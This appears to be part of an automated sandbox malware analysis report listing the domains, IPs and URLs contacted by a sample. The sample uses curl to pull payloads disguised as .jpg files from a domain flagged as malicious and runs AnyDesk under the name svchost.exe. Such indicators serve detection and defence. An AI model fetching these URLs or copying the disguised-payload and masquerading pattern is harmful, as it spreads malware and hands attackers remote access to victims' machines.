    http://downdown.ru/svchost.jpg100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    boot.net.anydesk.com
    		57.129.37.157
    		truefalse
      		high
      relay-30ea2fb5.net.anydesk.com
      		160.202.165.71
      		truefalse
        		high
        www.4t-niagara.com
        		94.23.158.211
        		truefalse
          		unknown
          downdown.ru
          		185.125.51.5
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://c.msn.com/c.gif?rnd=1736578471573&udc=true&pg.n=FRE&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f7b66e0f99774ee4994a9572d133a3c9&activityId=f7b66e0f99774ee4994a9572d133a3c9&d.imd=false&scr=1024x768&anoncknm=app_anon&issso=&aadState=0false
              		high
              http://downdown.ru/driver.jpgtrue
              • Avira URL Cloud: malware
              		unknown
              https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1false
                		high
                https://pr-bh.ybp.yahoo.com/sync/msn?gdpr=0&gdpr_consent=false
                  		high
                  https://m.adnxs.com/seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3Dfalse
                    		high
                    https://srtb.msn.com/notify/viewed?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=087acc36-08c1-4daa-8dbd-3c1c710f7f4a&ii=1&c=15351574985914386683&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1false
                      		high
                      https://c.msn.com/c.gif?rnd=1736578471573&udc=true&pg.n=FRE&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f7b66e0f99774ee4994a9572d133a3c9&activityId=f7b66e0f99774ee4994a9572d133a3c9&d.imd=false&scr=1024x768&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1FE748FF748B4324A916C66DF435B563&MUID=0136911D054E6BFC0E90846C04216AB7false
                        		high
                        https://ntp.msn.com/edge/ntp?locale=en-US&title=New+tab&OCID=MNHP_U531&enableForceCache=truefalse
                          		high
                          https://srtb.msn.com/notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=087acc36-08c1-4daa-8dbd-3c1c710f7f4a&ii=1&c=15351574985914386683&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1false
                            		high
                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578515356&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                              		high
                              https://m.adnxs.com/mapuid?member=280&user=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253Dfalse
                                		high
                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578485347&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                  		high
                                  https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=truefalse
                                    		high
                                    http://downdown.ru/blat.jpgtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578518356&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                      		high
                                      https://srtb.msn.com/notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=dfa64b01-ec54-411d-97b5-76d005271c07&ii=1&c=2556969255498558843&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1false
                                        		high
                                        https://srtb.msn.com/notify/served?rid=f7b66e0f99774ee4994a9572d133a3c9&r=river&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=13e49033-643c-448b-9c06-1bea332fabbe&ii=1&c=11891600591998607670&bid=4612d191-d50f-4858-b355-b9340e91f3fd&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1&t=type.msft-content-card&dec=1-1false
                                          		high
                                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578479355&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                            		high
                                            https://m.adnxs.com/mapuid?member=280&user=0136911D054E6BFC0E90846C04216AB7;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0136911D054E6BFC0E90846C04216AB7%2526gdpr%253D0%2526gdpr_consent%253Dfalse
                                              		high
                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578521342&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                		high
                                                https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.80e71276f1bec5cb9e6b.jsfalse
                                                  		high
                                                  https://trace.popin.cc/cs/msn?id=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent=false
                                                    		high
                                                    https://hbx.media.net/cksync.php?type=nms&cs=3&ovsid=0136911D054E6BFC0E90846C04216AB7&gdpr=0&gdpr_consent=false
                                                      		high
                                                      https://sb.scorecardresearch.com/b?rn=1736578471573&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26firstlaunch%3D1%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0136911D054E6BFC0E90846C04216AB7&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                        		high
                                                        https://m.adnxs.com/bounce?%2Fmapuid%3Fmember%3D280%26user%3D0136911D054E6BFC0E90846C04216AB7%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0136911D054E6BFC0E90846C04216AB7%252526gdpr%25253D0%252526gdpr_consent%25253Dfalse
                                                          		high
                                                          https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578509354&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                            		high
                                                            https://sync.inmobi.com/oRTB?redirect={PubRedirectUrl}&gdpr=0&gdpr_consent=false
                                                              		high
                                                              https://cm.mgid.com/m?cdsp=516415&c=0136911D054E6BFC0E90846C04216AB7&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent=false
                                                                		high
                                                                http://downdown.ru/svchost.jpgtrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://srtb.msn.com/auctionfalse
                                                                  		high
                                                                  https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736578512350&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                    		high

                                                                    URLs from Memory and Binaries

                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://support.anydesk.com/knowledge/userssvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                      		high
                                                                      https://anydesk.com/updatesvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                        		high
                                                                        https://support.anydesk.com/knowledge/pause-sessionsvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                          		high
                                                                          http://downdown.ru/wol.jpg8Vcurl.exe, 00000026.00000002.20395527745.0000000001568000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.pdf-tools.comYv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://datatracker.ietf.org/ipr/1526/svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.4t-niagara.com/checkupdate.php8naTrays.exe, 00000029.00000002.21461662298.00000000008AF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://policies.google.com/privacy?hl=$svchost.exefalse
                                                                              		high
                                                                              https://help.anydesk.comsvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://downdown.ru/svchost.jpgC:curl.exe, 00000024.00000002.20361596421.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000024.00000002.20361728129.0000000000EE0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://downdown.ru/blat.jpg:Yv24LkKBY6.exe, 00000000.00000003.20236390049.0000000002204000.00000004.00001000.00020000.00000000.sdmp, Yv24LkKBY6.exe, 00000000.00000003.20236487709.000000000220C000.00000004.00001000.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://downdown.ru/wol.jpgycurl.exe, 00000026.00000002.20395527745.0000000001560000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://support.anydesk.com/knowledge/what-is-full-client-managementsvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                		high
                                                                                https://support.anydesk.com/knowledge/account-migrationsvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                  		high
                                                                                  http://www.4t-niagara.com/checkupdate.phpniaTrays.exe, 00000029.00000002.21461662298.00000000008AF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://downdown.ru/wol.jpgWinsta0curl.exe, 00000026.00000002.20395373813.0000000001440000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000002.20395527745.0000000001560000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://help.anydesk.com/svchost.exetrue
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.innosetup.com/driver.exe, 00000028.00000003.20430251957.0000000002D20000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.4t-niagara.com/files/4t-min.exeTrays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.4t-niagara.com/tray.htmlTrays.exe, 00000029.00000002.21464015268.0000000002638000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000002.21461662298.000000000085E000.00000004.00000020.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21464015268.0000000002572000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://support.anydesk.com/knowledge/status-anynet_overloadsvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                    		high
                                                                                    http://www.4t-niagara.com/tray_next.html03bTrays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.4t-niagara.com/tray_faq.htmll2-37Trays.exe, 00000029.00000002.21461662298.0000000000810000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://anydesk.com/contact/sales)AnyDesk.exe, 00000030.00000003.20534656140.00000000040D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://downdown.ru/wol.jYv24LkKBY6.exe, 00000000.00000003.20236817758.0000000002210000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://downdown.ru/Trays.jpgC:curl.exe, 00000025.00000002.20386980186.0000000000930000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000025.00000002.20386688000.0000000000760000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.4t-niagara.comdriver.exe, 00000028.00000002.20433555662.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000028.00000003.20430251957.0000000002E83000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000262A000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://anydesk.com/en/assemblysvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://curl.haxx.se/docs/sslcerts.htmlcurlcurl.exefalse
                                                                                          		high
                                                                                          https://datatracker.ietf.org/ipr/1524/svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://my.anydesk.com/v2svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.4t-niagara.com/tray_order.html03bTrays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://anydesk.com/company#imprintsvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                		high
                                                                                                http://downdown.ru/blat.jpgscurl.exe, 00000023.00000002.20327423704.0000000000DB8000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.openssl.org/)svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://anydesk.com/pricing/teams)AnyDesk.exe, 00000030.00000003.20534656140.00000000040D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://curl.haxx.se/libcurl/c/curl_easy_setopt.htmlcurl.exe, 00000027.00000002.20416769958.000000000030B000.00000008.00000001.01000000.00000006.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.4t-niagara.com/tray.html5Trays.exe, 00000029.00000002.21461662298.0000000000818000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.gimp.org/xmp/svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://anydesk.com/de/datenschutzsvchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://downdown.ru/svchost.Yv24LkKBY6.exe, 00000000.00000003.20236817758.0000000002210000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://downdown.ru/wol.jpg.curl.exe, 00000026.00000002.20395527745.0000000001568000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.4t-niagara.com/tray_faq.htmllkTrays.exe, 00000029.00000002.21461662298.000000000085E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.4t-niagara.com/tray_order.htmlUdriver.exe, 00000028.00000003.20430251957.0000000002E12000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20435397641.0000000000401000.00000020.00000001.01000000.00000008.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://downdown.ru/svchost.jpg6Scurl.exe, 00000024.00000002.20361728129.0000000000EE8000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://my.anydesk.comsvchost.exefalse
                                                                                                            		high
                                                                                                            http://www.4t-niagara.com/checkupdate.phz(Trays.exe, 00000029.00000002.21461662298.000000000088F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.4t-niagara.com/tray.htmltmllTrays.exe, 00000029.00000002.21461662298.0000000000855000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.blat.net/hcurl.exe, 00000023.00000003.20325593592.0000000000DE2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000002.20327686955.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000023.00000003.20325554267.0000000000DF4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.openssl.org/support/faq.htmlYv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmp, curl.exe, curl.exe, 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000022.00000000.20288780667.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000002.20326809234.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000023.00000000.20311354865.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000000.20328637461.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000024.00000002.20361147934.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000002.20386342714.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000025.00000000.20362922109.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000002.20394831572.0000000000324000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000026.00000000.20388092061.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000000.20396877976.0000000000309000.00000008.00000001.01000000.00000006.sdmp, curl.exe, 00000027.00000002.20417147081.0000000000324000.00000008.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                              		high
                                                                                                              https://anydesk.com/pricing/teamssvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.4t-niagara.com/tray.htmlgestion...ACrei&Trays.exe, 00000029.00000002.21461662298.0000000000818000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.4t-niagara.com/tray_faq.htmldriver.exe, 00000028.00000003.20430251957.0000000002E83000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000002.21464015268.000000000261C000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmp, Trays.exe, 00000029.00000002.21464015268.0000000002572000.00000004.00001000.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.4t-niagara.com/checkupdate.phpb8Trays.exe, 00000029.00000002.21461662298.00000000008AF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://anydesk.com/en/assembly/termssvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://support.anydesk.comsvchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://support.anydesk.com/knowledge/waiting-for-image-black-screensvchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://downdown.ru/driver.jpgC:curl.exe, 00000022.00000002.20310151194.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.20310303622.0000000000D40000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://support.anydesk.com/knowledge/anydesk-for-android-chromeos#troubleshootingsvchost.exefalse
                                                                                                                        		high
                                                                                                                        http://4t-niagara.com/webimage.htmldriver.exe, 00000028.00000003.20430251957.0000000002E83000.00000004.00001000.00020000.00000000.sdmp, Trays.exe, 00000029.00000000.20436017665.00000000005A5000.00000002.00000001.01000000.00000008.sdmptrue
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://iptc.org/std/Iptc4xmpExt/2008-02-29/svchost.exe, 0000002A.00000002.20532332395.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002A.00000003.20441959446.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002C.00000002.20485530828.0000000000E4C000.00000002.00000001.01000000.00000009.sdmp, svchost.exe, 0000002C.00000003.20451690361.0000000002B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://downdown.ru/Trays.jpgWinsta0curl.exe, 00000025.00000002.20386980186.0000000000930000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000025.00000002.20386688000.0000000000760000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
